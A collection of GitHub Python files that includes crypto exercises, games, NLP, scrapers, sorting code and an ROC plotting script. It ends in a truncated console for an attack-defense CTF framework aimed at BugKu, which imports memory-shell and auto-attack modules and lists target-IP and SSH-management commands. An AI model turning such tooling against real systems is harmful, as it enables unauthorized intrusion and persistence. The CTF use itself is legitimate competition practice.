lamb*(x1-x3)-y1\n x3 %= P\n y3 %= P\n return [x3,y3]\na = 497\nb = 1768\nP = 9739\np = [493, 5564]\nq = [1539,4742]\nr = [4403,5202]\n","repo_name":"kogino-icepp/CTF","sub_path":"cryptohack/elliptic_curves/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27720535422","text":"import pygame\nfrom typing import List\nfrom player import Player\nfrom settings import GAME_SCENE_WIDTH, GAME_SCENE_HEIGHT\n\n\nclass GameScene:\n def __init__(self, players: List[Player]):\n self.scene_surface = pygame.Surface((GAME_SCENE_WIDTH, GAME_SCENE_HEIGHT))\n self.players = players\n\n def update(self, dt: float):\n for player in self.players:\n player.update(dt)\n\n\nclass Scene1(GameScene):\n def __init__(self, players: List[Player]):\n super().__init__(players)\n\n self.bg = pygame.Surface(self.scene_surface.get_size())\n\n ar = pygame.PixelArray(self.bg)\n maximum = self.bg.get_width() + self.bg.get_height()\n for x in range(self.bg.get_width()):\n for y in range(self.bg.get_height()):\n c = (x + y) / maximum * 255\n r, g, b = c, c, c\n ar[x, y] = (r, g, b)\n\n def update(self, dt: float):\n super().update(dt)\n self.scene_surface.fill(\"green\")\n self.scene_surface.blit(self.bg, (0, 0))\n for player in self.players:\n pygame.draw.rect(\n self.scene_surface, player.color, (player.pos[0], player.pos[1], 30, 30)\n )\n","repo_name":"brccabral/LocalMultiplayerCamerasPython","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2352065404","text":"from pathlib import Path\nimport spacy\nimport os\n\n# Load the spaCy model\nnlp = spacy.load('en_core_web_md')\n\ndef watch_next(desc):\n data_folder = os.path.dirname(os.path.abspath(__file__))\n file_to_open = os.path.join(data_folder, \"movies.txt\")\n \n with open(file_to_open, \"r\") as movies_data:\n data = movies_data.read()\n\n movies = data.split('\\n')\n lst = {}\n for token in movies:\n # print(token)\n token = nlp(token)\n \n result = token.similarity(desc)\n print()\n print(f\"output {result:.2f} \")\n lst[token.text] = result\n\n max_value = max(lst, key=lst.get)\n return max_value\n\ndescription = \"\"\"Will he save\ntheir world or destroy it? 
When the Hulk becomes too dangerous for the\nEarth, the Illuminati trick Hulk into a shuttle and launch him into space to a\nplanet where the Hulk can live in peace. Unfortunately, Hulk land on the\nplanet Sakaar where he is sold into slavery and trained as a gladiator.\"\"\"\n\nprint(watch_next(nlp(description)))\n","repo_name":"Simelweyinkosi1/Movie-reccomendation","sub_path":"watch_next/watch_next.py","file_name":"watch_next.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33896078640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 7 10:03:35 2020\n\n@author: nati1\n\n\"\"\"\n\n\n### Q1 ###\n\nclass student(object):\n def __init__(self, name, math):\n name_condition = name.split(\" \")\n assert len(name_condition) == 2, \"The name you have entered is not valid\"\n self.name = name\n assert type(math) == int and math <= 100 and math >= 0, \"Please enter integer type as math value\"\n self.math = math\n\n def get_name(self):\n return (self.name)\n\n def get_math(self):\n return self.math\n\n def __str__(self):\n math_grade = str(self.math)\n info = \"Student info:\\nName : \" + self.name + \"\\nMath test score :\" + str(math_grade)\n return (info)\n\n def __add__(self, s2):\n new_score = max(self.math, s2.math)\n self.math = s2.math = new_score\n if self.__class__ == eng_student and s2.__class__ != eng_student:\n phys1_grade = self.phys1\n s2 = eng_student(s2.name, s2.math, phys1_grade)\n elif s2.__class__ == eng_student and self.__class__ != eng_student:\n phys1_grade = s2.phys1\n self = eng_student(self.name, self.math, phys1_grade)\n\n return tuple((self.name, s2.name))\n\n\nclass eng_student(student):\n def __init__(self, name, math, phys1):\n student.__init__(self, name, math)\n self.phys1 = phys1\n\n\nNati = eng_student(\"Nati Iyov\", 73, 85)\nSagi = student(\"Sagi Krief\", 68)\n\nSagi + Nati\nprint(type(Sagi))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"LittleAndroidBunny/Python_Cheatsheet_Nohar_Batit","sub_path":"Class/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7310343203","text":"from typing import Literal\n\nfrom platformdirs import user_downloads_dir\n\nfrom textual.app import App, ComposeResult\nfrom textual import work\nfrom textual.reactive import reactive\nfrom textual.containers import (\n\tCenter\n)\nfrom textual.widgets import (\n\tStatic,\n\tLabel,\n\tInput,\n\tButton,\n\tSelect,\n\tLog\n)\n\nfrom _yt_dlp import YDL, FORMAT_EXTS, VIDEO_QUALITY\n\nMODE = {\n\t\"video\": \"video\",\n\t\"audio\": \"audio\"\n}\nMODE_TEXT = {\n\t\"video\": \"📹Video\",\n\t\"audio\": \"🔊Audio\"\n}\nclass Operation(Center):\n\t\"\"\"Main Widget to get the QueryBox settings\"\"\"\n\tmode = reactive(MODE[\"video\"])\n\n\tdef watch_mode(self, mode):\n\t\tself.query_one(\"#operation-audio-ext\").set_class(not(mode in MODE[\"audio\"]), \"hidden\")\n\t\tself.query_one(\"#operation-video-ext\").set_class(not(mode in MODE[\"video\"]), \"hidden\")\n\t\tself.query_one(\"#operation-video-quality\").set_class(not(mode in MODE[\"video\"]), \"hidden\")\n\n\tasync def on_button_pressed(self, event: Button.Pressed) -> None:\n\t\t\"\"\"The changer to the 'mode' variable\"\"\"\n\t\tbutton_id = event.button.id\n\t\tif button_id in MODE:\n\t\t\tself.mode = button_id\n\t\telse:\n\t\t\traise ValueError\n\n\tdef compose(self) -> None:\n\t\t# 
Top Operations\n\t\twith Static(id=\"operations\"):\n\t\t\tyield Button(MODE_TEXT[\"video\"], id=\"video\")\n\t\t\tyield Button(MODE_TEXT[\"audio\"], id=\"audio\")\n\n\t\twith Center():\n\t\t\t# Selectors\n\t\t\twith Static(id=\"operation\"):\n\t\t\t\tyield Select(\n\t\t\t\t\tlist(zip(FORMAT_EXTS[\"audio\"], FORMAT_EXTS[\"audio\"])),\n\t\t\t\t\tprompt=\"EXT Audio\", id=\"operation-audio-ext\")\n\t\t\t\tyield Select(\n\t\t\t\t\tlist(zip(FORMAT_EXTS[\"video\"], FORMAT_EXTS[\"video\"])),\n\t\t\t\t\tprompt=\"EXT Video\", id=\"operation-video-ext\")\n\t\t\t\tyield Select(\n\t\t\t\t\t[(item + \"p\", item) for item in VIDEO_QUALITY],\n\t\t\t\t\tprompt=\"Quality\", id=\"operation-video-quality\")\n\n\t\t\t# InputBox\n\t\t\twith Static(id=\"inputbox\"):\n\t\t\t\tyield Label(\"Insert a URL\", id=\"inputbox-log\")\n\t\t\t\tyield Input(\"\", placeholder=\"Search something...\", id=\"inputbox-input\")\n\t\t\t\t#yield Button(\"✅\", id=\"inputbox-confirm\")\n\nclass YDLApp(App):\n\tTITLE = \"YDL\"\n\tCSS_PATH = \"styles.tcss\"\n\tBINDINGS = [\n\t\t(\"d\", \"toggle_dark\", \"Toggle dark mode\")\n\t]\n\n\tdef compose(self) -> ComposeResult:\n\t\tyield Operation()\n\t\tyield Log(id=\"logger\")\n\n\tdef on_input_submitted(self, event: Input.Submitted) -> None:\n\t\tif event.input.id == \"inputbox-input\":\n\t\t\tself.start_download(event.input.value)\n\n\t@work(exclusive=True, thread=True)\n\tdef start_download(self, url: str) -> None:\n\t\tydl = YDL()\n\t\tmode = self.query_one(Operation).mode\n\n\t\tif mode == \"video\":\n\t\t\text = self.query_one(\"#operation-video-ext\").value\n\t\t\text_quality = self.query_one(\"#operation-video-quality\").value\n\t\t\tydl.download(\n\t\t\t\turl=url,\n\t\t\t\text=ext,\n\t\t\t\toutput_path=user_downloads_dir(),\n\t\t\t\tquality=ext_quality\n\t\t\t)\n\t\t\tself.query_one(\"#logger\").write_line(\"Video download completed!\")\n\t\telif mode == \"audio\":\n\t\t\text = self.query_one(\"#operation-audio-ext\").value\n\t\t\tydl.download(\n\t\t\t\turl=url,\n\t\t\t\text=ext,\n\t\t\t\toutput_path=user_downloads_dir()\n\t\t\t)\n\t\t\tself.query_one(\"#logger\").write_line(\"Audio download completed!\")\n\nif __name__ == \"__main__\":\n\tapp = YDLApp()\n\tapp.run()","repo_name":"Rikiub/media-dl","sub_path":"media_dl/textual_ui/bak/v2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28670422772","text":"from datetime import date\n\n\nclass Person:\n \"\"\"Class describing a person\n Person(name, date_of_birth) --> Person object\"\"\"\n MIN_YEAR = 1900 # class attribute\n count = 0\n\n def __init__(self, pname, dob):\n self.name = pname # instance attribute\n self.date_of_birth = dob\n self._increment_count()\n # Person.count += 1\n\n @property\n def date_of_birth(self): # getter\n return self._date_of_birth\n\n @date_of_birth.setter\n def date_of_birth(self, value): # setter\n if value.year < self.MIN_YEAR:\n raise Exception(f\"minimum year is {self.MIN_YEAR}\")\n self._date_of_birth = value\n\n @date_of_birth.deleter\n def date_of_birth(self): # deleter\n del self._date_of_birth\n\n @property\n def age(self):\n return self.compute_age(self.date_of_birth)\n\n # def __setattr__(self, key, value):\n # if key == 'date_of_birth':\n # if value.year < self.MIN_YEAR:\n # raise Exception(f\"minimum year is {self.MIN_YEAR}\")\n # super().__setattr__(key, value)\n\n def greet(self, greeting=\"hi\"): # instance methods\n print(f\"{greeting.capitalize()}! 
I am {self.name}.\")\n\n def __lt__(self, other):\n return self.date_of_birth > other.date_of_birth\n\n def __str__(self):\n return f\"{self.__class__.__name__} object (name={self.name})\"\n\n @classmethod\n def _increment_count(cls):\n cls.count += 1\n\n @staticmethod\n def compute_age(date_obj):\n diff = date.today() - date_obj\n return int(diff.days / 365.25)\n\n\nclass Student(Person):\n count = 0\n\n def __init__(self, name, date_of_birth, university):\n super().__init__(name, date_of_birth)\n self.university = university\n\n def greet(self, greeting=\"hello\"):\n print(f\"{greeting.capitalize()}! I am {self.name} and I study at {self.university}.\")\n\n def __str__(self):\n super_str = super().__str__()\n return super_str[:-1] + f\" univ={self.university}\" + super_str[-1]\n\n\nif __name__ == \"__main__\":\n print(Person.__doc__)\n p1 = Person(\"Ana\", date(2000, 4, 5))\n p2 = Person(\"Matei\", date(1985, 12, 25))\n print(p1, str(p1), repr(p1))\n\n # Attributes can be modified from outside the class\n p2.name = 'Andrei'\n print(p2.name, p2.date_of_birth)\n\n print(p1.MIN_YEAR is Person.MIN_YEAR)\n print(\"Person count:\", Person.count)\n\n p1.greet(\"hello\")\n p2.greet()\n\n # Can also be called as:\n Person.greet(p1, \"hello\")\n\n print('p1 is younger than p2:', p1 < p2)\n\n print(Person.compute_age(date(1800, 4, 8)))\n\n # Private/protected methods shouldn't be called from outside the class\n # Person._increment_count()\n # print(\"Person count:\", Person.count)\n\n # Magic methods can be called from outside the class\n print(p1.__str__())\n # But we should rather call use the built-in function or operator that calls\n # them under the hood\n print(str(p1))\n\n invalid_date = date(1898, 4, 2)\n try:\n p3 = Person(\"Ion\", invalid_date)\n except Exception:\n pass\n\n try:\n p1.date_of_birth = invalid_date\n except Exception:\n pass\n print(p1.date_of_birth)\n\n # del p1.date_of_birth\n # print(p1.date_of_birth)\n\n print(f\"{p1.name} is {p1.age} years old.\")\n\n s1 = Student(\"Ion Marinescu\", date(2001, 8, 2), \"CSIE\")\n s1.greet()\n print(str(s1))\n\n print(\"Person count:\", Person.count)\n print(\"Student count:\", Student.count)\n","repo_name":"fpax222/Fpax","sub_path":"examples/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32826739010","text":"#!/usr/bin/python\n'''\n@Author:gm_xiong@pku.edu.cn\n'''\nimport sys,json,time,traceback,os\nimport random\n\ndef trans_to_time(ss):\n try:\n return time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(float(ss)))\n except Exception as err:\n #traceback.print_exc()\n return 'time error: '+str(err)\n\nfor line in sys.stdin:\n\n #line = line.replace(\"\\\"\",'')\n\n data_dict = json.loads(line.replace(\" \",\"\"))\n\n sort_key_list = sorted(data_dict) #这是key组成的list\n sort_value_list = sorted(data_dict.values()) #这是values组成的list\n \n time_first = trans_to_time(sort_key_list[0])\n time_last = trans_to_time(sort_key_list[-1])\n\n null_value = sort_value_list.count(\"\")\n\n #Hadoop环境使用\n #filename = os.environ[\"mapreduce_map_input_file\"]\n\n #本地测试使用\n filename = \"filename_test_\"+str(random.randint(0,999))\n\n\n print ('%s_len\\t%s'%(filename,str(len(data_dict))))\n print ('%s_first\\t%s'%(filename,time_first))\n print ('%s_last\\t%s'%(filename,time_last))\n\n if '2017-10-31' in time_first:\n print ('2017-10-31\\t1')\n else:\n print 
('2017-10-31\\t0')\n\n\n\n\n#{\"1509379200\":327588,\"1509386400\":348041,\"1509393600\":353297,\"1509404400\":369732}\n","repo_name":"81981266/BigDataProject","sub_path":"HadoopStreaming_Kaggle/mapper_kaggle_1.py","file_name":"mapper_kaggle_1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20891061200","text":"#! /usr/bin/env python3.6\nimport sys\nfrom heapq import merge\nfrom runner import run_sort_test\n\ndef msort(data):\n '''do a merge sort'''\n if len(data) == 1:\n return data\n mid = len(data) // 2\n left = data[:mid]\n right = data[mid:]\n merged = merge(msort(left),msort(right))\n return merged\n\ndef mergesort(data):\n '''make it look like msort runs in-place so the test harness works'''\n data[:] = msort(data)\n\nif __name__ == '__main__':\n run_sort_test(mergesort)\n","repo_name":"markatto/practice-sorts","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3587770555","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy import Spider, Request\n\nfrom dianping.dz_location import getlocation\nfrom dianping.items import BabyItem\n\n\nclass BabySpider(Spider):\n name = 'baby'\n allowed_domains = ['www.dianping.com']\n start_urls = ['http://www.dianping.com/shenzhen/ch70']\n\n custom_settings = {\n 'LOG_FILE': 'log_baby.txt',\n }\n\n def parse(self, response):\n print('parse response.url:' + response.url)\n self.logger.debug('parse response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.t-district')\n print('1' * 50)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_region)\n\n def parse_region(self, response):\n print('parse_region response.url:' + response.url)\n self.logger.debug('parse_region response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.tsub-list')\n print('2' * 100)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_classfy)\n\n def parse_classfy(self, response):\n print('parse_classfy response.url:' + response.url)\n self.logger.debug('parse_classfy response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.t-type')\n print('3' * 150)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_list)\n\n def parse_list(self, response):\n print('parse_list response.url:' + response.url)\n self.logger.debug('parse_list response.url:' + response.url)\n item = BabyItem()\n\n li = response.css('.shop-list>li')\n print('parse_list li:{} response.url: {}'.format(li.css('.shopname::text').extract(), response.url))\n self.logger.debug('parse_list li:{} response.url: {}'.format(li.css('.shopname::text').extract(), response.url))\n for i in li:\n item['title'] = i.css('.shopname::text').extract_first()\n item['url'] = 'http:' + i.css('.shopname::attr(href)').extract_first()\n if i.css('a img::attr(data-lazyload)').extract_first():\n item['img'] = 'http:' + i.css('a img::attr(data-lazyload)').extract_first()\n else:\n item['img'] = 'http:' + i.css('a 
img::attr(src)').extract_first()\n item['star'] = float(i.css('.item-rank-rst::attr(class)').re_first(r'[1-9]\\d*|0')) / 10\n if i.css('.comment-count a::text').re_first(r'[1-9]\\d*|0'):\n item['review_num'] = int(i.css('.comment-count a::text').re_first(r'[1-9]\\d*|0'))\n item['mean_price'] = i.css('.price::text').extract_first()\n if i.css('.product-count a::text').extract_first():\n item['product_photos'] = i.css('.product-count a::text').extract_first().strip('\"')\n if i.css('.key-list::text').extract_first():\n item['location'] = ' '.join(i.css('.key-list::text').extract_first().strip().split())\n else:\n item['location'] = ''\n getlocation(item)\n item['number'] = item['url'].split('/')[-1]\n yield item\n\n le = LinkExtractor(restrict_css='div.Pages > a.NextPage')\n print('4' * 200)\n links = le.extract_links(response)\n # print(links, links.url, links.text)\n if links:\n next_url = links[0].url\n print('next_url:', next_url)\n yield Request(next_url, callback=self.parse_list)\n","repo_name":"wangqian6151/dazhongdianping","sub_path":"dianping/spiders/baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"358974462","text":"\n\ndef search2DMatrix(mat,target):\n\n\n def binarySearch(array,target):\n\n start = 0\n end = len(array)\n\n while start < end:\n\n mid = start + (end - start)//2\n\n\n if array[mid] == target:\n\n return True\n\n elif array[mid] < target:\n\n start = mid +1\n\n\n else:\n end = mid\n \n return False\n\n\n for row in mat:\n\n if target < mat[-1]:\n\n return binarySearch(row,target)\n\n\n return False\n\n","repo_name":"dikshap07/Algorithms-and-Data-Structures","sub_path":"src/search2DMatrix.py","file_name":"search2DMatrix.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69914846006","text":"\"\"\"\nNota: A pesar de parecer simple considero que es un problema complejo si no se tiene el enfoque correcto.\n\nTraduccion del problema: Secuencia casi incremental\n\nTraducccion del enunciado:\n Dada una secuencia de enteros en un arreglo determinar cuando es posible obtener una secuencia estrictamente creciente\n removiendo no mas de un elemento del arreglo.\n\nEnfoque (approach):\n En este caso debemos tener en cuenta que no estamos limitados a usar una sola función.\n Por ende tendremos dos funciones:\n\n busqueda_disparejo:\n simplemente realiza la operación deseada: busca al elemento que es mayor o igual al siguiente\n devuelve ese elemento cuando lo encuentra o en cualquier otro caso retorna -1.\n\n almosIncreasingSecuence:\n si el indice es -1 finaliza el programa.\n si el indice no lo es, repite la funcion quitando el indice de la secuencia. (se a quitado un elemento de la secuencia)\n si se repite, se buca la siguiente posicion y se vuelve a comprobar. (se quita un segundo elemento)\n Si no se da ninguno de los anteriores no es la secuencia que buscamos.\n\nPD: La idea a futuro es modificar esté codigo. 
Usar algo mas comprensible y funcional.\n \n\"\"\"\n\n\ndef busqueda_disparejo(sequence):\n for i in range(len(sequence) - 1):\n if sequence[i] >= sequence[i + 1]:\n return i\n return -1\n\n\ndef almostIncreasingSequence(sequence):\n c = 0\n indice = busqueda_disparejo(sequence)\n if indice == -1:\n return True\n if busqueda_disparejo(sequence[indice - 1:indice] + sequence[indice + 1:]) == -1:\n return True\n if busqueda_disparejo(sequence[indice:indice + 1] + sequence[indice + 2:]) == -1:\n return True\n return False\n\n\n# El test fue hecho con la idea de verificar los fallos si implementamos diferentes algoritmos.\ndef test():\n #1\n if (almostIncreasingSequence( [1, 3, 2] )):\n print(\"ok\")\n else:\n print(\"revisar el primero\")\n #2\n if (almostIncreasingSequence( [10, 1, 2, 3, 4, 5] )):\n print(\"ok\")\n else:\n print(\"revisar el segundo\")\n #3\n if (almostIncreasingSequence( [0, -2, 5, 6] )): #verdadero\n print(\"ok\")\n else:\n print(\"revisar el tercero\")\n #4\n if not (almostIncreasingSequence([1, 3, 2, 1])): # falso\n print(\"ok\")\n else:\n print(\"revisar el cuarto\")\n # 5\n if not (almostIncreasingSequence([1, 2, 1, 2] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el quinto\")\n # 6\n if not (almostIncreasingSequence( [1, 4, 10, 4, 2] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el sexto\")\n # 7\n if not (almostIncreasingSequence([1, 1, 1, 2, 3])): # falso\n print(\"ok\")\n else:\n print(\"revisar el septimo\")\n # 8\n if not (almostIncreasingSequence( [40, 50, 60, 10, 20, 30] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el octavo\")\n # 9\n if (almostIncreasingSequence( [1, 1] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el noveno\")\n # 10\n if (almostIncreasingSequence([1, 2, 3, 4, 3, 6])): # true\n print(\"ok\")\n else:\n print(\"revisar el decimo\")\ntest()\n\n\n\n","repo_name":"AlexisWolfWaisman/CodeFights-spanish","sub_path":"arcade/intro/LacostaDelOceano/almostIncreasingSecuence.py","file_name":"almostIncreasingSecuence.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41974689262","text":"\"\"\"\nroc_w_tf-servimg.py\n\nSending RGB image tiles to a running tf-serving POST for prediction and plotting ROC curve\n\nauthor: @DevelopmentSeed\n\nusage:\npython3 roc_w_tf-servimg.py --test_path=test \\\n --keyword1=not_school \\\n --keyword2=school \\\n --server_endpoint='http://localhost:8501/v1/models/2nd-iter_more-schools_tf-serving:predict' \\\n --plot_dir=plot_dir \\\n --model_time=\"0122_071829\"\n\n\n\"\"\"\n\n# needed package for serving the tf-serving image\nimport os\nimport json\nimport pprint\nimport time\nimport base64\nimport requests\nimport glob\nimport itertools\n\n# needed package for plotting ROC curve\n\nfrom os import makedirs, path as op\nimport numpy as np\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy.spatial.distance import euclidean\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom keras import backend as K\nfrom keras.applications.xception import preprocess_input as xcept_preproc\nimport yaml\nfrom tqdm import tqdm\n\nimport argparse\nimport sys\n\ndef grouper(n, iterable, fillvalue=None):\n \"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return itertools.zip_longest(*args, fillvalue=fillvalue)\n\ndef prediction(test_path, keyword1, keyword2, server_endpoint):\n \"\"\"\n function to compare y_test and 
y_predction in order to plot the ROC curve\n\n ----\n Params:\n test_path: file path for the test dataset\n keyword1: the catagory name 1 under the test path\n keyword2: the catagory name 2 under the test path\n server_endpoint: the url of tf-serving endpoint when you run your tf-serving docker image\n\n ----\n return: y_test and y_predict as numpy array\n \"\"\"\n not_school_images_paths = sorted(glob.glob(op.join(test_path, keyword1) + \"/*.jpg\"))\n school_images_paths = sorted(glob.glob(op.join(test_path, keyword2) + \"/*.jpg\"))\n\n y_test = list()\n for img in school_images_paths:\n y_test.append([img, 1, 0])\n\n for img in not_school_images_paths:\n y_test.append([img, 0, 1])\n\n imgs_lst = [item[0] for item in y_test]\n y_pred = []\n for group in grouper(50, imgs_lst):\n instances = []\n for img_fpath in group:\n print(img_fpath)\n try:\n with open(img_fpath, 'rb') as imageFile:\n b64_image = base64.b64encode(imageFile.read())\n instances.append({'image_bytes': {'b64': b64_image.decode('utf-8')}})\n except:\n pass\n\n payload = json.dumps({\"instances\": instances})\n\n start = time.time()\n r = requests.post(server_endpoint, data=payload)\n elapsed = time.time() - start\n\n #########################\n # Print results\n #########################\n pp = pprint.PrettyPrinter()\n print('\\nPredictions from local images:')\n pp.pprint(json.loads(r.content)['predictions'])\n y_pred.append(json.loads(r.content)['predictions'])\n # y_pred = [group] + y_pred\n\n print('Elapsed time: {} sec'.format(elapsed))\n y_pred_flatten = [item for sublist in y_pred for item in sublist]\n print(\"the total images go to plot ROC curve is:\")\n len_2plot = len(y_pred_flatten)\n print(\"*\" * 40)\n print(len_2plot)\n # get the first column of the y_test with the first 3000\n y_test_2plot = [item[2] for item in y_test[:len_2plot]]\n # get the first prediction column of y_pred for school\n y_pred_2plot = [item[0] for item in y_pred_flatten]\n y_test_arr = np.array(y_test_2plot)\n y_pred_arr = np.array(y_pred_2plot)\n\n return y_test_arr, y_pred_arr\n\ndef plot_roc(y_test_arr, y_pred_arr, plot_dir, model_time):\n \"\"\"\n Plot ROC curve\n \"\"\"\n if not op.isdir(plot_dir):\n makedirs(plot_dir)\n plot_dir = plot_dir\n model_time = model_time\n\n y_neg_pred = y_pred_arr[y_test_arr == 0] # Predictions for negative examples\n y_pos_pred = y_pred_arr[y_test_arr == 1] # Predictions for positive examples\n\n # Accuracy (should match tensorboard)\n correct = np.sum(y_test_arr == np.round(y_pred_arr))\n total = y_test_arr.shape[0]\n acc = float(correct)/ float(total)\n print('Accuracy: {:0.5f}'.format(acc))\n # Compute FPR, TPR for '1' label (i.e., positive examples)\n fpr, tpr, thresh = roc_curve(y_test_arr, y_pred_arr)\n roc_auc = auc(fpr, tpr)\n\n # Min corner dist (*one* optimal value for threshold derived from ROC curve)\n corner_dists = np.empty((fpr.shape[0]))\n for di, (x_val, y_val) in enumerate(zip(fpr, tpr)):\n corner_dists[di] = euclidean([0., 1.], [x_val, y_val])\n opt_cutoff_ind = np.argmin(corner_dists)\n min_corner_x = fpr[opt_cutoff_ind]\n min_corner_y = tpr[opt_cutoff_ind]\n\n ####################\n # Plot\n ####################\n print('Plotting.')\n plt.close('all')\n sns.set()\n sns.set_style('darkgrid', {\"axes.facecolor\": \".9\"})\n sns.set_context('talk', font_scale=1.1)\n\n fig, ax = plt.subplots(1, 1, figsize=(6, 6))\n ax.plot(fpr, tpr, lw=2, label='ROC curve (area={:0.2f})'.format(roc_auc))\n ax.plot([min_corner_x, min_corner_x], [0, min_corner_y],\n color='r', lw=1, label='Min-corner 
distance\\n(FPR={:0.2f}, thresh={:0.2f})'.format(min_corner_x, thresh[opt_cutoff_ind]))\n plt.plot([0, 1], [0, 1], color='black', lw=0.75, linestyle='--')\n ax.set_xlim([-0.03, 1.0])\n ax.set_ylim([0.0, 1.03])\n ax.set_xlabel('False Positive Rate\\n(1 - Specificity)')\n ax.set_ylabel('True Positive Rate\\n(Sensitivity)')\n ax.set_aspect('equal')\n ax.set_title('ROC curve for schools detection')\n plt.legend(loc=\"lower right\")\n fig.tight_layout()\n fig.savefig(op.join(plot_dir, 'roc_{}.png'.format(model_time)),\n dpi=150)\n\n # Plot a kernel density estimate and rug plot\n fig2, ax2 = plt.subplots(1, 1, figsize=(8, 6))\n kde_kws = dict(shade=True, clip=[0., 1.], alpha=0.3)\n rug_kws = dict(alpha=0.2)\n sns.distplot(y_neg_pred, hist=False, kde=True, rug=True, norm_hist=True, color=\"b\",\n kde_kws=kde_kws, rug_kws=rug_kws, label='True negatives', ax=ax2)\n sns.distplot(y_pos_pred, hist=False, kde=True, rug=True, norm_hist=True, color=\"r\",\n kde_kws=kde_kws, rug_kws=rug_kws, label='True positives', ax=ax2)\n ax2.set_title('Predicted scores for true positives and true negatives')\n ax2.set_xlim([0.0, 1.0])\n ax2.set_xlabel(\"Model's predicted score\")\n ax2.set_ylabel('Probability density')\n plt.legend(loc=\"best\")\n fig2.savefig(op.join(plot_dir, 'dist_fpr_tpr_{}.png'.format(model_time)),\n dpi=150)\n\ndef parse_arg(args):\n desc = \"plot_ROC_tf-serving\"\n dhf = argparse.RawTextHelpFormatter\n parse0 = argparse.ArgumentParser(description= desc, formatter_class=dhf)\n parse0.add_argument('--test_path', help=\"file path for the test dataset\")\n parse0.add_argument('--keyword1', help='the catagory name 1 under the test path')\n parse0.add_argument('--keyword2', help='the catagory name 2 under the test path')\n parse0.add_argument('--server_endpoint', help='the url of tf-serving endpoint when you run your tf-serving docker image')\n parse0.add_argument('--plot_dir', help='the directory to save plotted ROC curve')\n parse0.add_argument('--model_time', help='The model time from a trained model')\n return vars(parse0.parse_args(args))\n\ndef main(test_path, keyword1, keyword2, server_endpoint, plot_dir, model_time):\n y_test_arr, y_pred_arr = prediction(test_path, keyword1, keyword2, server_endpoint)\n plot_roc(y_test_arr, y_pred_arr, plot_dir, model_time)\n\ndef cli():\n args = parse_arg(sys.argv[1:])\n main(**args)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"developmentseed/unicef-schools","sub_path":"main_model/utility-scripts/roc_w_tf-serving.py","file_name":"roc_w_tf-serving.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"12137674700","text":"# coding=utf-8\r\nfrom cmd import Cmd\r\nfrom config.MemShellConfig import *\r\nfrom code.AutoAck import *\r\nfrom code.MemShell import *\r\nimport os\r\nclass YmlConsole(Cmd):\r\n prompt = \"YML-FOR-BugKu-> \"\r\n Object = None\r\n\r\n def __init__(self):\r\n Cmd.__init__(self)\r\n\r\n def preloop(self):\r\n string = \"\"\"\r\n ##########YML-AWD-Farmwork-FOR-BugKu-V3.0#################\r\n Powered By yemoli\r\n Date:2021-04-11 \r\n 1.BugKu新版IP添加只需指定前缀ip与端口即可,如192-168-1-X.awd.bugku.cn可使用如下命令\r\n addip 192.168.0.1-255 80 \r\n 2.存活探测在test.py \r\n \r\n \"\"\"\r\n self.commandHelp = \"\"\"\r\n Command Tips\r\n =============\r\n\r\n Command Tips\r\n ------- -----------\r\n init 初始化(清空靶机ip列表)\r\n addip 添加靶机 ip和端口\r\n removeip 移除某个ip\r\n showip 查看ip列表 \r\n addssh 添加ssh信息\r\n showssh 查看ssh列表\r\n removessh 移除某个ssh\r\n passh 更改ssh密码 \r\n 
